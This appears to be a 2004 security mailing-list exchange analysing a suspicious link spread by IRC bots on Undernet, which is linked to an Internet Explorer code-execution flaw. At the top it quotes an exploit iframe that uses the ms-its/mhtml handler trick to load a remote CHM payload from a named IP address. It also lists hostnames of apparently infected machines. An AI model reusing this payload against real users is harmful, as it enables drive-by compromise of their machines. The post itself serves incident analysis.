<iframe src="ms-its:mhtml:file://c:\Css.MHT!http://69.157.174.169:2233//chm2.chm::/rundl.html"; length="1" height="1"></iframe>
This leads me to believe it may a malicious website setup in an attempt to exploit a flaw in IE that was discovered last month ("MSIE Unspecified File Processing Arbitrary Code Execution Vulnerability")and not a worm. You can get more info on it here:
http://www.securityfocus.com/bid/9658/info/
Good call alerting the ISP. Hopefully they'll knock it offline pretty quick.
Charles Hamby
Karousel wrote:
Hi,
I think it's a new worm spreading on undernet. The worm PRIVMSG user with an ip address and port like this (ip and port never change) : [07:53] <C96347981> http://69.157.174.169:2233/
If you telnet to this address, you'll get
C:\telnet 69.157.174.169 2233 GET / HTTP/1.1 HTTP/1.1 200 OK Server: My Bitchin' IE Infector Date: Sat Mar 27 13:22:27 2004 Content-type: text/html Accept-Encoding: identity Accept-ranges: bytes
<<snip content>>
Connection to host lost. C:\
it may not be related, but telneting to port 80 will disconnect you with an "unknown" response as soon you type a letter C:\telnet 69.157.174.169 80 GUNKNOWN
Connection to host lost. C:\
Each user wich sent me this address seems to had the (almost) same pattern for nick and fullname: 1 letter followed by number. Some fullname are followed by 11 numbers, others by 12 numbers. None of them was on any channels at all.
C14130657 is Guest18231@Toronto-HSE-ppp3970074.sympatico.ca * E63731312752 S66185921 is ~M93079924@pcp01044550pcs.villgs01.fl.comcast.net * O12647092342 C96347981 is ~O98407918@host217-44-126-36.range217-44.btcentralplus.com * Y710488319397 M84234958 is Guest92377@AOrleans-103-1-33-71.w81-250.abo.wanadoo.fr * O58235883713 Z29553055 is Guest58875@nwc102-194.nwconx.net * E815603852272 O23413228 is Guest32361@062249161030.customer.alfanett.no * F729082226753 I65330976 is ~E89040321@adsl-216-103-54-205.dsl.lsan03.pacbell.net * C527516603470
The isp (sympatico.ca) has been notified on march 27 at 10:00 am and this computer is still up.
